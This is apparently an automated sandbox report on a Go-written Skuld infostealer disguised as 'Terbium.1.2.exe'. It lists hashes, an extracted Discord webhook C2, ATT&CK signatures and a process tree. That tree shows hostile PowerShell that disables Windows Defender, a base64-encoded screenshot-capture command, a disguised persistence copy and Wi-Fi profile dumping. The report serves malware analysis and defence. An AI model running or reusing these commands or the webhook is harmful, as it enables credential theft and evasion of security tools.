Resubmissions

15-07-2024 03:33

240715-d4kvnawdjr 10

15-07-2024 03:33

240715-d38kbsyepg 10

15-07-2024 03:32

240715-d3zx7awcrj 10

15-07-2024 03:31

240715-d3acjawcnq 10

Analysis

  • max time kernel
    6s
  • max time network
    22s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15-07-2024 03:31

General

  • Target

    Terbium.1.2.exe

  • Size

    9.5MB

  • MD5

    df00bc36e9b00874ff8f495a29d9f429

  • SHA1

    3f3140a188943673e7b90b819005548042c9b675

  • SHA256

    27e10c80006f2080f85b3b9aff0d165044d1954385ea16d6e48dabaa6a1ec5af

  • SHA512

    c79ce66d9c73e64cc3060437bf9d2f9f3f17067b0e4ebb8b30d4863ec417ad1f95c315810168d34058f82804ca59a1d8f442d81c265e57dc330670025b152f88

  • SSDEEP

    98304:YVMHJFAvLQWabWp2le10+9XTA8E6oMsaSk5e/UI:PFAvLCev10+9DA16oM1e/UI

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1260739914253991956/NKvC4KymlhPTNJNmbkQtDwm5AXdtAESkrV95KgMKN5kz9Z_06X949ZzR7jGGnoW0AnBX

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe"
    1⤵
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
      2⤵
      • Views/modifies file attributes
      PID:4460
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:3992
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3516
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2740
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
        PID:4764
      • C:\Windows\System32\Wbem\wmic.exe
        wmic cpu get Name
        2⤵
          PID:4388
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2368
        • C:\Windows\System32\Wbem\wmic.exe
          wmic csproduct get UUID
          2⤵
            PID:3044
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4684
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:208
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.cmdline"
              3⤵
                PID:2520
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "c:\Users\Admin\AppData\Local\Temp\yov5nsms\CSC71CEEFD2B0C44E6A959B82265ABF371F.TMP"
                  4⤵
                    PID:2512
              • C:\Windows\system32\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                2⤵
                • Views/modifies file attributes
                PID:2680
              • C:\Windows\system32\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                2⤵
                • Views/modifies file attributes
                PID:2272

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              8592ba100a78835a6b94d5949e13dfc1

              SHA1

              63e901200ab9a57c7dd4c078d7f75dcd3b357020

              SHA256

              fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

              SHA512

              87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              701e6c2d07c92f98875e1628951af04d

              SHA1

              b7c8b3bf60a450948146919cbdf9d5b49bee8901

              SHA256

              85a0e3f494fd2f94dbab52932e1345b13309ecaa6e205d8dfececf1c9e908df2

              SHA512

              64fe20322e18bf02a8f0475e37999fa20646e18912c1bd2701d2c0193332c368c4cab648576bce80215ef737d747c43640da37250ca44e714d4152f368158035

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              c15fc7ae02737d0d3ad4f2661cd36f7a

              SHA1

              918d61d129d646e60ec5571fddfc191909fd1b00

              SHA256

              5182c5f7e38cab0d75853eef5a56fece89de82e460c7cbec3c2ebcf1fabab13e

              SHA512

              3709f600d2d0d1d97cc1c0ec761a8d4dc653d2f463357f729e12f9e99bdef9e67d83328735e239b6d33138c0e1515f19194a5fe0793f05b9ef2cfd3c13b0d9fe

            • C:\Users\Admin\AppData\Local\Temp\RES49.tmp

              Filesize

              1KB

              MD5

              073af3f6ea2d9923c01ea619c4524d99

              SHA1

              4aa536f75d5d44231c249f85f9bdc9aeafd631d5

              SHA256

              c7dc31ecfc3494c944af69c10f90251dcecc96cab1474fa6d32aa7b156d72b42

              SHA512

              55bc0b9a024ae16322d56be136c112dddf3f07e1f4dbad39771b1c270dcb6c1bdf2a9fea5f600f436269bf2a0b3dd79f4d53c6f409ea1bde916859093b99e59b

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqr0bioa.q1h.ps1

              Filesize

              1B

              MD5

              c4ca4238a0b923820dcc509a6f75849b

              SHA1

              356a192b7913b04c54574d18c28d46e6395428ab

              SHA256

              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

              SHA512

              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            • C:\Users\Admin\AppData\Local\Temp\jUNzNF1dJ0\Display (1).png

              Filesize

              431KB

              MD5

              eec9e9bfa6183b07428d644502a9c1a8

              SHA1

              68c20ace5364c6b2d6f7480f0f788e09edc2451e

              SHA256

              7772f05fe93895d72a063994f236b8ca1c2ea6a66eff866fcc71e6f749c68d2d

              SHA512

              353d5d529dea68bd2a60e03ab3096e396e5891499916c4c910688814a003b7d210f94aa35756edff97418baa92df764d5537106bc2b8eb753b46cfeb7a23969c

            • C:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.dll

              Filesize

              4KB

              MD5

              ac2c66c08c8e1d0560be22ddcf1842c7

              SHA1

              eea6ce947b921684a5055d422842dc8e1c9eae95

              SHA256

              e7878676630da8e9b758a399f9b4735e9bb5ce8f958dacbd0b5c629eeffc3a2b

              SHA512

              c2dd79266d111e61b906dfcbd78cdc1d4adce71dad22c5ca190e912bcb69916e48564d530179d56d91d3c1f2068949e844480118c24697c8c76297500a0ecd21

            • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

              Filesize

              9.5MB

              MD5

              df00bc36e9b00874ff8f495a29d9f429

              SHA1

              3f3140a188943673e7b90b819005548042c9b675

              SHA256

              27e10c80006f2080f85b3b9aff0d165044d1954385ea16d6e48dabaa6a1ec5af

              SHA512

              c79ce66d9c73e64cc3060437bf9d2f9f3f17067b0e4ebb8b30d4863ec417ad1f95c315810168d34058f82804ca59a1d8f442d81c265e57dc330670025b152f88

            • C:\Windows\System32\drivers\etc\hosts

              Filesize

              2KB

              MD5

              29637f421cb5eb9a9008b5b091823270

              SHA1

              8bb0b01ef0035a029c4ba8f6814db41fba1e716a

              SHA256

              d3925354d35ce50360d165ece7ab2d44ee49a7aaac7f297ad8f2192249432a46

              SHA512

              08a1efeaf082525439af8abfb117d3473ab23da5a4db276bdb49eb4a62db8ae2e14e6333c897753a22855a3c45beb413c3eafc98c2a46142c75297ce4d563665

            • \??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\CSC71CEEFD2B0C44E6A959B82265ABF371F.TMP

              Filesize

              652B

              MD5

              ad6051b69d5b0d6e320e3ef7d260d9e8

              SHA1

              120a188cc5fdb578eef7a2f5889238a6f4383731

              SHA256

              916df697100ba37771ae58f8bc70d3168351a1e427e6e418db35c52c1fe2a00b

              SHA512

              705b718d197c4187c590571936d8c5db8d47c1ca3cba104fe6458a62fea33e148faa403c57e3e1d8ea3547b093fca793903c948e2a973936359949ad38b77646

            • \??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.0.cs

              Filesize

              1004B

              MD5

              c76055a0388b713a1eabe16130684dc3

              SHA1

              ee11e84cf41d8a43340f7102e17660072906c402

              SHA256

              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

              SHA512

              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

            • \??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.cmdline

              Filesize

              607B

              MD5

              3c73d3208ee3c22e1c4e333f396a3bed

              SHA1

              fd3aeceedb73863af8ef29b6eae3516f1ca1b80b

              SHA256

              57c560462621e56e6ed32fe008815561de582658ae6f6045dc9aa442f920034c

              SHA512

              0f9ef9684773da6321b63e9fa590d28b593471b6b19f5ff1f0278172d63accdcd3e07a66cd775a100838707fc8c035df65fc204381f4499066a345ce74270307

            • memory/208-181-0x0000016B5A7A0000-0x0000016B5A7A8000-memory.dmp

              Filesize

              32KB

            • memory/2740-12-0x000001AADEE00000-0x000001AADEE76000-memory.dmp

              Filesize

              472KB

            • memory/2740-7-0x000001AADEAF0000-0x000001AADEB12000-memory.dmp

              Filesize

              136KB